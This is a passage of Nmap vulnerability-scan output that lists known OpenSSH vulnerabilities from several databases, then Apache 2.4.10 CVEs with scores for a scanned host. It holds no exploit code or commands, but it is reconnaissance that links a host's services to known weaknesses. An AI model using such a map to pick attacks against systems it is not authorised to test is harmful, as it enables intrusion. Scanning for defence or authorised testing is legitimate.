4208| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
4209| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
4210| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
4211| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
4212| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
4213| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
4214| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
4215| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
4216| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
4217| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
4218| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
4219| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
4220| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
4221| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
4222| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
4223| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
4224| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
4225| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
4226| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
4227| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
4228| [75990] OpenSSH Login Handling Security Bypass Weakness
4229| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
4230| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
4231| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
4232| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
4233| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
4234| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
4235| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
4236| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
4237| [61286] OpenSSH Remote Denial of Service Vulnerability
4238| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
4239| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
4240| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
4241| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
4242| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
4243| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
4244| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
4245| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
4246| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
4247| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
4248| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
4249| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
4250| [30794] Red Hat OpenSSH Backdoor Vulnerability
4251| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
4252| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
4253| [28531] OpenSSH ForceCommand Command Execution Weakness
4254| [28444] OpenSSH X Connections Session Hijacking Vulnerability
4255| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
4256| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
4257| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
4258| [20956] OpenSSH Privilege Separation Key Signature Weakness
4259| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
4260| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
4261| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
4262| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
4263| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
4264| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
4265| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
4266| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
4267| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
4268| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
4269| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
4270| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
4271| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
4272| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
4273| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
4274| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
4275| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
4276| [6168] OpenSSH Visible Password Vulnerability
4277| [5374] OpenSSH Trojan Horse Vulnerability
4278| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
4279| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
4280| [4241] OpenSSH Channel Code Off-By-One Vulnerability
4281| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
4282| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
4283| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
4284| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
4285| [2917] OpenSSH PAM Session Evasion Vulnerability
4286| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
4287| [2356] OpenSSH Private Key Authentication Check Vulnerability
4288| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
4289| [1334] OpenSSH UseLogin Vulnerability
4290|
4291| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4292| [83258] GSI-OpenSSH auth-pam.c security bypass
4293| [82781] OpenSSH time limit denial of service
4294| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
4295| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
4296| [72756] Debian openssh-server commands information disclosure
4297| [68339] OpenSSH pam_thread buffer overflow
4298| [67264] OpenSSH ssh-keysign unauthorized access
4299| [65910] OpenSSH remote_glob function denial of service
4300| [65163] OpenSSH certificate information disclosure
4301| [64387] OpenSSH J-PAKE security bypass
4302| [63337] Cisco Unified Videoconferencing OpenSSH weak security
4303| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
4304| [45202] OpenSSH signal handler denial of service
4305| [44747] RHEL OpenSSH backdoor
4306| [44280] OpenSSH PermitRootLogin information disclosure
4307| [44279] OpenSSH sshd weak security
4308| [44037] OpenSSH sshd SELinux role unauthorized access
4309| [43940] OpenSSH X11 forwarding information disclosure
4310| [41549] OpenSSH ForceCommand directive security bypass
4311| [41438] OpenSSH sshd session hijacking
4312| [40897] OpenSSH known_hosts weak security
4313| [40587] OpenSSH username weak security
4314| [37371] OpenSSH username data manipulation
4315| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
4316| [37112] RHSA update for OpenSSH signal handler race condition not installed
4317| [37107] RHSA update for OpenSSH identical block denial of service not installed
4318| [36637] OpenSSH X11 cookie privilege escalation
4319| [35167] OpenSSH packet.c newkeys[mode] denial of service
4320| [34490] OpenSSH OPIE information disclosure
4321| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
4322| [32975] Apple Mac OS X OpenSSH denial of service
4323| [32387] RHSA-2006:0738 updates for openssh not installed
4324| [32359] RHSA-2006:0697 updates for openssh not installed
4325| [32230] RHSA-2006:0298 updates for openssh not installed
4326| [32132] RHSA-2006:0044 updates for openssh not installed
4327| [30120] OpenSSH privilege separation monitor authentication verification weakness
4328| [29255] OpenSSH GSSAPI user enumeration
4329| [29254] OpenSSH signal handler race condition
4330| [29158] OpenSSH identical block denial of service
4331| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
4332| [25116] OpenSSH OpenPAM denial of service
4333| [24305] OpenSSH SCP shell expansion command execution
4334| [22665] RHSA-2005:106 updates for openssh not installed
4335| [22117] OpenSSH GSSAPI allows elevated privileges
4336| [22115] OpenSSH GatewayPorts security bypass
4337| [20930] OpenSSH sshd.c LoginGraceTime denial of service
4338| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
4339| [17213] OpenSSH allows port bouncing attacks
4340| [16323] OpenSSH scp file overwrite
4341| [13797] OpenSSH PAM information leak
4342| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
4343| [13264] OpenSSH PAM code could allow an attacker to gain access
4344| [13215] OpenSSH buffer management errors could allow an attacker to execute code
4345| [13214] OpenSSH memory vulnerabilities
4346| [13191] OpenSSH large packet buffer overflow
4347| [12196] OpenSSH could allow an attacker to bypass login restrictions
4348| [11970] OpenSSH could allow an attacker to obtain valid administrative account
4349| [11902] OpenSSH PAM support enabled information leak
4350| [9803] OpenSSH "
4351| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
4352| [9307] OpenSSH is running on the system
4353| [9169] OpenSSH "
4354| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
4355| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
4356| [8383] OpenSSH off-by-one error in channel code
4357| [7647] OpenSSH UseLogin option arbitrary code execution
4358| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
4359| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
4360| [7179] OpenSSH source IP access control bypass
4361| [6757] OpenSSH "
4362| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
4363| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
4364| [5517] OpenSSH allows unauthorized access to resources
4365| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
4366|
4367| Exploit-DB - https://www.exploit-db.com:
4368| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
4369|
4370| OpenVAS (Nessus) - http://www.openvas.org:
4371| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
4372| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
4373| [881183] CentOS Update for openssh CESA-2012:0884 centos6
4374| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
4375| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
4376| [870763] RedHat Update for openssh RHSA-2012:0884-04
4377| [870129] RedHat Update for openssh RHSA-2008:0855-01
4378| [861813] Fedora Update for openssh FEDORA-2010-5429
4379| [861319] Fedora Update for openssh FEDORA-2007-395
4380| [861170] Fedora Update for openssh FEDORA-2007-394
4381| [861012] Fedora Update for openssh FEDORA-2007-715
4382| [840345] Ubuntu Update for openssh vulnerability USN-597-1
4383| [840300] Ubuntu Update for openssh update USN-612-5
4384| [840271] Ubuntu Update for openssh vulnerability USN-612-2
4385| [840268] Ubuntu Update for openssh update USN-612-7
4386| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
4387| [840214] Ubuntu Update for openssh vulnerability USN-566-1
4388| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
4389| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
4390| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
4391| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
4392| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
4393| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
4394| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
4395| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
4396| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
4397| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
4398| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
4399| [100584] OpenSSH X Connections Session Hijacking Vulnerability
4400| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
4401| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
4402| [65987] SLES10: Security update for OpenSSH
4403| [65819] SLES10: Security update for OpenSSH
4404| [65514] SLES9: Security update for OpenSSH
4405| [65513] SLES9: Security update for OpenSSH
4406| [65334] SLES9: Security update for OpenSSH
4407| [65248] SLES9: Security update for OpenSSH
4408| [65218] SLES9: Security update for OpenSSH
4409| [65169] SLES9: Security update for openssh,openssh-askpass
4410| [65126] SLES9: Security update for OpenSSH
4411| [65019] SLES9: Security update for OpenSSH
4412| [65015] SLES9: Security update for OpenSSH
4413| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
4414| [61639] Debian Security Advisory DSA 1638-1 (openssh)
4415| [61030] Debian Security Advisory DSA 1576-2 (openssh)
4416| [61029] Debian Security Advisory DSA 1576-1 (openssh)
4417| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
4418| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
4419| [60667] Slackware Advisory SSA:2008-095-01 openssh
4420| [59014] Slackware Advisory SSA:2007-255-01 openssh
4421| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
4422| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
4423| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
4424| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
4425| [57492] Slackware Advisory SSA:2006-272-02 openssh
4426| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
4427| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
4428| [57470] FreeBSD Ports: openssh
4429| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
4430| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
4431| [56294] Slackware Advisory SSA:2006-045-06 openssh
4432| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
4433| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
4434| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
4435| [53788] Debian Security Advisory DSA 025-1 (openssh)
4436| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
4437| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
4438| [11343] OpenSSH Client Unauthorized Remote Forwarding
4439| [10954] OpenSSH AFS/Kerberos ticket/token passing
4440| [10883] OpenSSH Channel Code Off by 1
4441| [10823] OpenSSH UseLogin Environment Variables
4442|
4443| SecurityTracker - https://www.securitytracker.com:
4444| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
4445| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
4446| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
4447| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
4448| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
4449| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
4450| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
4451| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
4452| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
4453| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
4454| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
4455| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
4456| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
4457| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
4458| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
4459| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
4460| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
4461| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
4462| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
4463| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
4464| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
4465| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
4466| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
4467| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
4468| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
4469| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
4470| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
4471| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
4472| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
4473| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
4474| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
4475| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
4476| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
4477| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
4478| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
4479| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
4480| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
4481| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
4482|
4483| OSVDB - http://www.osvdb.org:
4484| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
4485| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
4486| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
4487| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
4488| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
4489| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
4490| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
4491| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
4492| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
4493| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
4494| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
4495| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
4496| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
4497| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
4498| [56921] OpenSSH Unspecified Remote Compromise
4499| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
4500| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
4501| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
4502| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
4503| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
4504| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
4505| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
4506| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
4507| [43745] OpenSSH X11 Forwarding Local Session Hijacking
4508| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
4509| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
4510| [37315] pam_usb OpenSSH Authentication Unspecified Issue
4511| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
4512| [34601] OPIE w/ OpenSSH Account Enumeration
4513| [34600] OpenSSH S/KEY Authentication Account Enumeration
4514| [32721] OpenSSH Username Password Complexity Account Enumeration
4515| [30232] OpenSSH Privilege Separation Monitor Weakness
4516| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
4517| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
4518| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
4519| [29152] OpenSSH Identical Block Packet DoS
4520| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
4521| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
4522| [22692] OpenSSH scp Command Line Filename Processing Command Injection
4523| [20216] OpenSSH with KerberosV Remote Authentication Bypass
4524| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
4525| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
4526| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
4527| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
4528| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
4529| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
4530| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
4531| [6601] OpenSSH *realloc() Unspecified Memory Errors
4532| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
4533| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
4534| [6072] OpenSSH PAM Conversation Function Stack Modification
4535| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
4536| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
4537| [5408] OpenSSH echo simulation Information Disclosure
4538| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
4539| [4536] OpenSSH Portable AIX linker Privilege Escalation
4540| [3938] OpenSSL and OpenSSH /dev/random Check Failure
4541| [3456] OpenSSH buffer_append_space() Heap Corruption
4542| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
4543| [2140] OpenSSH w/ PAM Username Validity Timing Attack
4544| [2112] OpenSSH Reverse DNS Lookup Bypass
4545| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
4546| [1853] OpenSSH Symbolic Link 'cookies' File Removal
4547| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
4548| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
4549| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
4550| [688] OpenSSH UseLogin Environment Variable Local Command Execution
4551| [642] OpenSSH Multiple Key Type ACL Bypass
4552| [504] OpenSSH SSHv2 Public Key Authentication Bypass
4553| [341] OpenSSH UseLogin Local Privilege Escalation
4554|_
455580/tcp open http Apache httpd 2.4.10 ((Debian))
4556|_http-server-header: Apache/2.4.10 (Debian)
4557| vulners:
4558| cpe:/a:apache:http_server:2.4.10:
4559| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
4560| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
4561| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
4562| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
4563| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
4564| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
4565| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
4566| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
4567| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
4568| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
4569| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
4570| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
4571| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
4572| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
4573| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
4574| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
4575| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
4576| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
4577| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
4578| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
4579| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
4580|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
4581| vulscan: VulDB - https://vuldb.com:
4582| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
4583| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
4584| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
4585| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
4586| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
4587| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
4588| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
4589|
4590| MITRE CVE - https://cve.mitre.org:
4591| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
4592| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
4593| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
4594| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
4595| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
4596| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
4597| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
4598| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
4599| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
4600| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
4601|
4602| SecurityFocus - https://www.securityfocus.com/bid/:
4603| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
4604| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
4605| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
4606| [15177] PHP Apache 2 Local Denial of Service Vulnerability
4607| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
4608| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
4609| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
4610| [5485] Apache 2.0 Path Disclosure Vulnerability
4611| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
